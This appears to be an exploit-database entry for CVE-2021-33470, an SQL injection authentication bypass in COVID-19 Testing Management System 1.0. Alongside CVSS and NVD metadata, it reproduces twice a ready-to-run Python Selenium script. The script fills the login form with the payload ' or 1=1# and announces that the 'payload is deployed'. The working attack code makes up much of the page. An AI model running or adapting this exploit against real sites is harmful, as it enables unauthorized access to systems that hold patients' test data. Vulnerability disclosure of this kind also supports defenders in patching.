COVID-19 Testing Management System 1.0 SQL Injection Exploit

2021-06-08T00:00:00

Description

COVID-19 Testing Management System version 1.0 remote SQL injection exploit based upon the original discovery by Rohit Burke in May of 2021.

{"id": "1337DAY-ID-36374", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "COVID-19 Testing Management System 1.0 SQL Injection Exploit", "description": "COVID-19 Testing Management System version 1.0 remote SQL injection exploit based upon the original discovery by Rohit Burke in May of 2021.", "published": "2021-06-08T00:00:00", "modified": "2021-06-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/36374", "reporter": "nu11secur1ty", "references": [], "cvelist": ["CVE-2021-33470"], "immutableFields": [], "lastseen": "2021-12-03T01:57:58", "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-33470"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163014"]}], "rev": 4}, "score": {"value": 5.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-33470"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163014"]}]}, "exploitation": null, "vulnersScore": 5.4}, "sourceHref": "https://0day.today/exploit/36374", "sourceData": "# Exploit Title: COVID19 Testing Management System 1.0 - SQL Injection\n(Authentication Bypass)\n# Author: @nu11secur1ty\n# Testing and Debugging: @nu11secur1ty\n# Vendor: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/\n# Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/\n# CVE: CVE-2021-33470\n# Proof: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-33470/CVE-2021-33470.gif\n\n[+] Exploit Source:\n\n#!/usr/bin/python3\n# Author: @nu11secur1ty\n# Debug: @nu11secur1ty\n# CVE: CVE-2021-33470\n\nfrom selenium import webdriver\nimport time\n\n\n#enter the link to the website you want to automate login.\nwebsite_link=\"\nhttp://192.168.1.160/Covid19-TMS%20Project%20Using%20PHP%20and%20MySQL/covid-tms/login.php\n\"\n\n#enter your login username SQL bling injection\nusername=\"nu11secur1ty' or 1=1#\"\n#enter your login password SQL bling injection\npassword=\"nu11secur1ty' or 1=1#\"\n\n# test and proof the SQL injection\n# user: admin\n# password: password\n\n#enter the element for username input field\nelement_for_username=\"username\"\n#enter the element for password input field\nelement_for_password=\"inputpwd\"\n\n#enter the element for submit button by class\nelement_for_submit=\"btn.btn-primary.btn-user.btn-block\"\n\n#browser = webdriver.Safari() #for macOS users[for others use chrome vis\nchromedriver]\nbrowser = webdriver.Chrome() #uncomment this line,for chrome users\n#browser = webdriver.Firefox() #uncomment this line,for chrome users\n\nbrowser.get((website_link))\n\ntry:\nusername_element = browser.find_element_by_name(element_for_username)\nusername_element.send_keys(username)\npassword_element = browser.find_element_by_name(element_for_password)\npassword_element.send_keys(password)\ntime.sleep(3)\nsignInButton = browser.find_element_by_class_name(element_for_submit)\nsignInButton.click()\n\nprint(\"payload is deployed NOW, you have SQL Authentication Bypass =)...\\n\")\n\nexcept Exception:\n#### This exception occurs if the element are not found in the webpage.\nprint(\"Some error occured :(\")\n", "category": "web applications", "verified": true, "_state": {"dependencies": 1646005155}}

{"cve": [{"lastseen": "2022-04-25T17:26:33", "description": "COVID19 Testing Management System 1.0 is vulnerable to SQL Injection via the admin panel.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-26T17:15:00", "type": "cve", "title": "CVE-2021-33470", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33470"], "modified": "2022-04-25T15:15:00", "cpe": ["cpe:/a:covid19_testing_management_system_project:covid19_testing_management_system:1.0"], "id": "CVE-2021-33470", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33470", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:covid19_testing_management_system_project:covid19_testing_management_system:1.0:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2021-06-08T14:41:10", "description": "", "cvss3": {}, "published": "2021-06-08T00:00:00", "type": "packetstorm", "title": "COVID-19 Testing Management System 1.0 SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-33470"], "modified": "2021-06-08T00:00:00", "id": "PACKETSTORM:163014", "href": "https://packetstormsecurity.com/files/163014/COVID-19-Testing-Management-System-1.0-SQL-Injection.html", "sourceData": "`# Exploit Title: COVID19 Testing Management System 1.0 - SQL Injection \n(Authentication Bypass) \n# Author: @nu11secur1ty \n# Testing and Debugging: @nu11secur1ty \n# Date: 06.08.2021 \n# Vendor: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ \n# Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ \n# CVE: CVE-2021-33470 \n# Proof: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-33470/CVE-2021-33470.gif \n \n[+] Exploit Source: \n \n#!/usr/bin/python3 \n# Author: @nu11secur1ty \n# Debug: @nu11secur1ty \n# CVE: CVE-2021-33470 \n \nfrom selenium import webdriver \nimport time \n \n \n#enter the link to the website you want to automate login. \nwebsite_link=\" \nhttp://192.168.1.160/Covid19-TMS%20Project%20Using%20PHP%20and%20MySQL/covid-tms/login.php \n\" \n \n#enter your login username SQL bling injection \nusername=\"nu11secur1ty' or 1=1#\" \n#enter your login password SQL bling injection \npassword=\"nu11secur1ty' or 1=1#\" \n \n# test and proof the SQL injection \n# user: admin \n# password: password \n \n#enter the element for username input field \nelement_for_username=\"username\" \n#enter the element for password input field \nelement_for_password=\"inputpwd\" \n \n#enter the element for submit button by class \nelement_for_submit=\"btn.btn-primary.btn-user.btn-block\" \n \n#browser = webdriver.Safari() #for macOS users[for others use chrome vis \nchromedriver] \nbrowser = webdriver.Chrome() #uncomment this line,for chrome users \n#browser = webdriver.Firefox() #uncomment this line,for chrome users \n \nbrowser.get((website_link)) \n \ntry: \nusername_element = browser.find_element_by_name(element_for_username) \nusername_element.send_keys(username) \npassword_element = browser.find_element_by_name(element_for_password) \npassword_element.send_keys(password) \ntime.sleep(3) \nsignInButton = browser.find_element_by_class_name(element_for_submit) \nsignInButton.click() \n \nprint(\"payload is deployed NOW, you have SQL Authentication Bypass =)...\\n\") \n \nexcept Exception: \n#### This exception occurs if the element are not found in the webpage. \nprint(\"Some error occured :(\") \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163014/covid19tms10-sql.py.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

COVID-19 Testing Management System 1.0 SQL Injection Exploit

Description

Related